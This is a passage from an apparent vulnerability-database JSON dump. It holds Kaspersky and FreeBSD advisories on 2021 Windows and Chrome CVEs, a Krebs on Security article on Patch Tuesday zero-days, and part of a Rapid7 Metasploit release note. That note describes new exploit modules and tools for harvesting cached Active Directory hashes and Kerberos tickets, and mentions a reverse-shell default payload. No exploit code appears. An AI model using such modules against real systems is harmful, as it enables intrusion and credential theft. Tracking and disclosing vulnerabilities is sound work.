\n[CVE-2021-31952](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31952>) \n[CVE-2021-31974](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31974>) \n[CVE-2021-31955](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31955>) \n[CVE-2021-31962](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31962>) \n[CVE-2021-31956](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31956>) \n[CVE-2021-31954](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31954>) \n[CVE-2021-1675](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-1675>) \n[CVE-2021-31953](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31953>) \n[CVE-2021-31960](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31960>) \n[CVE-2021-31968](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31968>) \n[CVE-2021-31958](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31958>) \n[CVE-2021-31959](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31959>) \n[CVE-2021-31969](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31969>) \n[CVE-2021-31977](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31977>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-31956](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31956>)9.3Critical \n[CVE-2021-31973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31973>)4.6Warning \n[CVE-2021-33742](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33742>)6.8High \n[CVE-2021-31954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31954>)7.2High \n[CVE-2021-31201](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31201>)4.6Warning \n[CVE-2021-31199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31199>)4.6Warning \n[CVE-2021-1675](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675>)9.3Critical \n[CVE-2021-31953](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31953>)4.6Warning \n[CVE-2021-31968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31968>)5.0Critical \n[CVE-2021-31958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31958>)6.8High \n[CVE-2021-31971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31971>)6.8High \n[CVE-2021-26414](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26414>)4.3Warning \n[CVE-2021-31959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31959>)6.8High \n[CVE-2021-31962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31962>)7.5Critical \n[CVE-2021-31975](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31975>)7.8Critical \n[CVE-2021-31967](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31967>)6.8High \n[CVE-2021-31972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31972>)2.1Warning \n[CVE-2021-31976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31976>)7.8Critical \n[CVE-2021-31970](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31970>)2.1Warning \n[CVE-2021-33739](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33739>)4.6Warning \n[CVE-2021-31951](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31951>)7.2High \n[CVE-2021-31952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31952>)7.2High \n[CVE-2021-31974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31974>)5.0Critical \n[CVE-2021-31955](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31955>)2.1Warning \n[CVE-2021-31960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31960>)2.1Warning \n[CVE-2021-31969](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31969>)4.6Warning \n[CVE-2021-31977](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31977>)5.0Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5003636](<http://support.microsoft.com/kb/5003636>) \n[5003681](<http://support.microsoft.com/kb/5003681>) \n[5003637](<http://support.microsoft.com/kb/5003637>) \n[5003671](<http://support.microsoft.com/kb/5003671>) \n[5003696](<http://support.microsoft.com/kb/5003696>) \n[5003646](<http://support.microsoft.com/kb/5003646>) \n[5003638](<http://support.microsoft.com/kb/5003638>) \n[5003697](<http://support.microsoft.com/kb/5003697>) \n[5003635](<http://support.microsoft.com/kb/5003635>) \n[5003687](<http://support.microsoft.com/kb/5003687>) \n[5014702](<http://support.microsoft.com/kb/5014702>) \n[5014699](<http://support.microsoft.com/kb/5014699>) \n[5014692](<http://support.microsoft.com/kb/5014692>) \n[5014710](<http://support.microsoft.com/kb/5014710>) \n[5014747](<http://support.microsoft.com/kb/5014747>) \n[5014738](<http://support.microsoft.com/kb/5014738>) \n[5014741](<http://support.microsoft.com/kb/5014741>) \n[5014697](<http://support.microsoft.com/kb/5014697>) \n[5014746](<http://support.microsoft.com/kb/5014746>) \n[5014701](<http://support.microsoft.com/kb/5014701>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12202 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2022-06-30T00:00:00", "id": "KLA12202", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12202/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T11:59:39", "description": "### *Detect date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows RT 8.1 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31956](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31956>) \n[CVE-2021-31973](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31973>) \n[CVE-2021-33742](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33742>) \n[CVE-2021-31954](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31954>) \n[CVE-2021-31201](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31201>) \n[CVE-2021-31199](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31199>) \n[CVE-2021-1675](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-1675>) \n[CVE-2021-31953](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31953>) \n[CVE-2021-31968](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31968>) \n[CVE-2021-31958](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31958>) \n[CVE-2021-31971](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31971>) \n[CVE-2021-26414](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-26414>) \n[CVE-2021-31959](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31959>) \n[CVE-2021-31962](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31962>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5003695](<http://support.microsoft.com/kb/5003695>) \n[5003636](<http://support.microsoft.com/kb/5003636>) \n[5003661](<http://support.microsoft.com/kb/5003661>) \n[5003667](<http://support.microsoft.com/kb/5003667>) \n[5003694](<http://support.microsoft.com/kb/5003694>) \n[5014742](<http://support.microsoft.com/kb/5014742>) \n[5014748](<http://support.microsoft.com/kb/5014748>) \n[5014752](<http://support.microsoft.com/kb/5014752>) \n[5014743](<http://support.microsoft.com/kb/5014743>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12198 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2022-06-15T00:00:00", "id": "KLA12198", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12198/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:30", "description": "\n\nChrome Releases reports:\n\nThis release contains two security fixes:\n\n[1196781] High CVE-2021-21206: Use after free in Blink. Reported\n\t by Anonymous on 2021-04-07\n[1196683] High CVE-2021-21220: Insufficient validation of\n\t untrusted input in V8 for x86_64. Reported by Bruno Keith (@bkth_)\n\t and Niklas Baumstark (@_niklasb) of Dataflow Security (@dfsec_it)\n\t via ZDI (ZDI-CAN-13569) on 2021-04-07>\n\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-04-13T00:00:00", "id": "7C0D71A9-9D48-11EB-97A0-E09467587C17", "href": "https://vuxml.freebsd.org/freebsd/7c0d71a9-9d48-11eb-97a0-e09467587c17.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T15:51:30", "description": "\n\nChrome Reelases reports:\n\nThis release includes 7 security fixes, including:\n\n1194046] High CVE-2021-21222: Heap buffer overflow in V8.\n\t Reported by Guang Gong of Alpha Lab, Qihoo 360 on 2021-03-30\n[1195308] High CVE-2021-21223: Integer overflow in Mojo.\n\t Reported by Guang Gong of Alpha Lab, Qihoo 360 on 2021-04-02\n[1195777] High CVE-2021-21224: Type Confusion in V8. Reported\n\t by Jose Martinez (tr0y4) from VerSprite Inc. on 2021-04-05\n[1195977] High CVE-2021-21225: Out of bounds memory access in\n\t V8. Reported by Brendon Tiszka (@btiszka) supporting the EFF on\n\t 2021-04-05\n[1197904] High CVE-2021-21226: Use after free in navigation.\n\t Reported by Brendon Tiszka (@btiszka) supporting the EFF on\n\t 2021-04-11\n\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "freebsd", "title": "chromium -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-04-20T00:00:00", "id": "CB13A765-A277-11EB-97A0-E09467587C17", "href": "https://vuxml.freebsd.org/freebsd/cb13a765-a277-11eb-97a0-e09467587c17.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2021-06-15T08:32:06", "description": "**Microsoft** today released another round of security updates for **Windows** operating systems and supported software, _including fixes for six zero-day bugs that malicious hackers already are exploiting in active attacks._\n\n\n\nJune's Patch Tuesday addresses just 49 security holes -- about half the normal number of vulnerabilities lately. But what this month lacks in volume it makes up for in urgency: Microsoft warns that bad guys are leveraging a half-dozen of those weaknesses to break into computers in targeted attacks.\n\nAmong the zero-days are:\n\n-[CVE-2021-33742](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33742>), a remote code execution bug in a Windows HTML component. \n-[CVE-2021-31955](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955>), an information disclosure bug in the Windows Kernel \n-[CVE-2021-31956](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956>), an elevation of privilege flaw in Windows NTFS \n-[CVE-2021-33739](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33739>), an elevation of privilege flaw in the Microsoft Desktop Window Manager \n-[CVE-2021-31201](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201>), an elevation of privilege flaw in the Microsoft Enhanced Cryptographic Provider \n-[CVE-2021-31199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199>), an elevation of privilege flaw in the Microsoft Enhanced Cryptographic Provider\n\n**Kevin Breen**, director of cyber threat research at **Immersive Labs**, said elevation of privilege flaws are just as valuable to attackers as remote code execution bugs: Once the attacker has gained an initial foothold, he can move laterally across the network and uncover further ways to escalate to system or domain-level access.\n\n"This can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools," Breen said. "The 'exploit detected' tag means attackers are actively using them, so for me, it\u2019s the most important piece of information we need to prioritize the patches."\n\nMicrosoft also patched five critical bugs -- flaws that can be remotely exploited to seize control over the targeted Windows computer without any help from users. [CVE-2021-31959](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31959>) affects everything from **Windows 7** through **Windows 10** and **Server** versions **2008**,** 2012**, **2016** and **2019**.\n\n**Sharepoint** also got a critical update in [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963>); Microsoft says this one is less likely to be exploited, but then critical Sharepoint flaws are a favorite target of ransomware criminals.\n\nInterestingly, two of the Windows zero-day flaws -- CVE-2021-31201 and CVE-2021-31199 -- are related to a patch **Adobe** released recently for [CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>), a flaw in **Adobe Acrobat** and **Reader** that also is being actively exploited.\n\n"Attackers have been seen exploiting these vulnerabilities by sending victims specially crafted PDFs, often attached in a phishing email, that when opened on the victim's machine, the attacker is able to gain arbitrary code execution," said** Christopher Hass**, director of information security and research at **Automox**. "There are no workarounds for these vulnerabilities, patching as soon as possible is highly recommended."\n\nIn addition to updating Acrobat and Reader, Adobe patched flaws in a slew of other products today, including **Adobe Connect,** **Photoshop**, and **Creative Cloud**. The full list is [here](<https://helpx.adobe.com/security.html>), with links to updates.\n\nThe usual disclaimer:\n\nBefore you update with this month\u2019s patch batch, please make sure you have backed up your system and/or important files. It\u2019s not uncommon for Windows updates to hose one\u2019s system or prevent it from booting properly, and some updates even have been known to erase or corrupt files.\n\nSo do yourself a favor and backup _before_ installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.\n\nFor a quick visual breakdown of each update released today and its severity level, check out the [this Patch Tuesday post](<https://isc.sans.edu/forums/diary/Microsoft+June+2021+Patch+Tuesday/27506/>) from the **SANS Internet Storm Center**.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-08T20:53:28", "type": "krebs", "title": "Microsoft Patches Six Zero-Day Security Holes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31959", "CVE-2021-31963", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T20:53:28", "id": "KREBS:E374075CAB55D7AB06EBD73CB87D33CD", "href": "https://krebsonsecurity.com/2021/06/microsoft-patches-six-zero-day-security-holes/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-05-14T14:54:19", "description": "## Two new Active Directory attacks\n\n\n\nThis week we added [a pair of new post-exploitation modules](<https://github.com/rapid7/metasploit-framework/pull/11130>) from community contributor [timb-machine](<https://github.com/timb-machine>). Both modules target UNIX machines running SSSD or One Identity's Vintela Authentication Services (VAS) as Active Directory integration solutions. The new [UNIX Gather Cached AD Hashes](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md>) module can be used on a UNIX target to obtain all cached Active Directory hashes, which can then be cracked using John the Ripper. The second module is [UNIX Gather Kerberos Tickets](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/unix_kerberos_tickets.md>), which as the name suggests, can similarly be used on a vulnerable target to obtain cached Kerberos tickets.\n\n## Focusing on Micro Focus\n\nThanks to [pedrib](<https://github.com/pedrib>) for two new pull requests related to Micro Focus Operations Bridge Manager and Bridge Reporter. Pedrib contributed a new [Micro Focus Operations Bridge Reporter Unauthenticated Command Injection ](<https://github.com/rapid7/metasploit-framework/pull/15090>) module, which exploits an unauthenticated command injection vulnerability on Linux, versions 10.40 and below ([CVE-2021-22502](<https://attackerkb.com/topics/lGSaEhn81Z/cve-2021-22502?referrer=blog>)). Pedrib also [updated](<https://github.com/rapid7/metasploit-framework/pull/15087>) the existing [Micro Focus Operations Bridge Manager Local Privilege Escalation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/local/microfocus_operations_privesc.md>) module to also support Operations Bridge Reporter.\n\n## PR #15000!\n\nCongratulations to [pingport80](<https://github.com/pingport80>), who snagged [PR #15,000](<https://github.com/rapid7/metasploit-framework/pull/15000>)! This enhancement replaces existing usages of `which` in `Msf::Sessions::CommandShell.binary_exists` with `command -v` \u2014 a more portable solution that works consistently across different shells.\n\n## New Module Content (6)\n\n * [GravCMS Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15030>) by Mehmet Ince, which exploits [CVE-2021-21425](<https://attackerkb.com/topics/DXBeSBbvfn/cve-2021-21425?referrer=blog>) \\- This adds a new remote exploit module that leverages unauthenticated arbitrary YAML write/update vulnerability to get remote code execution under the context of the web server user. This vulnerability has been fixed in the admin component version 1.10.10, which was released with GravCMS version 1.7.9.\n * [Micro Focus Operations Bridge Reporter Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15090>) by Pedro Ribeiro, which exploits [CVE-2021-22502](<https://attackerkb.com/topics/lGSaEhn81Z/cve-2021-22502?referrer=blog>). This is an unauthenticated OS command injection vulnerability in the Micro Focus Operations Bridge Reporter.\n * [IGEL OS Secure VNC/Terminal Command Injection RCE](<https://github.com/rapid7/metasploit-framework/pull/14947>) by James Brytan, James Smith, Marisa Mack, Rob Vinson, Sergey Pashevkin, and Steven Laura - This adds a new module that exploits an unauthenticated command injection vulnerability in the Secure Terminal and Secure Shadow services in various versions of IGEL OS.\n * [Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE](<https://github.com/rapid7/metasploit-framework/pull/15105>) by Bruno Keith (bkth_), Grant Willcox (tekwizz123), Niklas Baumstark (_niklasb), and Rajvardhan Agarwal (r4j0x00), which exploits [CVE-2021-21220](<https://attackerkb.com/topics/guR2zJ2y2K/cve-2021-21220?referrer=blog>) \\- This adds an exploit module for a Chrome V8 XOR typer OOB Access RCE that was found in the 2021 Pwn2Own competition by Dataflow Security's Niklas Baumstark (@niklasb) and Bruno Keith (@bkth). \nNote that this module will require you to run Chrome without the sandbox enabled as it does not come with a sandbox escape.\n * [UNIX Gather Cached AD Hashes](<https://github.com/rapid7/metasploit-framework/pull/11130>) by Tim Brown - Retrieves cached Active Directory credentials from two different solutions on UNIX (SSSD and VAS).\n * [UNIX Gather Kerberos Tickets](<https://github.com/rapid7/metasploit-framework/pull/11130>) by Tim Brown - Retrieves cached Kerberos tickets from two different solutions on UNIX (SSSD and VAS).\n\n## Enhancements and features\n\n * [#14831](<https://github.com/rapid7/metasploit-framework/pull/14831>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Updates the HttpClient mixin with a new cookie jar implementation which correctly updates and merges the `Set-Cookie` header responses when using the `send_request_cgi` `keep_cookies` option\n * [#15000](<https://github.com/rapid7/metasploit-framework/pull/15000>) from [pingport80](<https://github.com/pingport80>) \\- Replaces the use of the `which` command with `command -v` giving us a more portable solution\n * [#15087](<https://github.com/rapid7/metasploit-framework/pull/15087>) from [pedrib](<https://github.com/pedrib>) \\- The `exploit/windows/local/microfocus_operations_privesc` module now supports both vulnerable Operations Bridge Manager installations and vulnerable Operations Bridge Reporter installations, with the new additional target being Operations Bridge Reporter.\n * [#15096](<https://github.com/rapid7/metasploit-framework/pull/15096>) from [pingport80](<https://github.com/pingport80>) \\- This adds shell session support to the `post/windows/gather/checkvm` module. This also notably adds cross-platform support for getting a list of running processes using shell and Meterpreter sessions.\n * [#15136](<https://github.com/rapid7/metasploit-framework/pull/15136>) from [pedrib](<https://github.com/pedrib>) \\- Update the `exploit/multi/http/microfocus_ucmdb_unauth_deser` module default Linux payload from `cmd/unix/generic` to `cmd/unix/reverse_python`.\n * [#15138](<https://github.com/rapid7/metasploit-framework/pull/15138>) from [h00die](<https://github.com/h00die>) \\- This enhances the 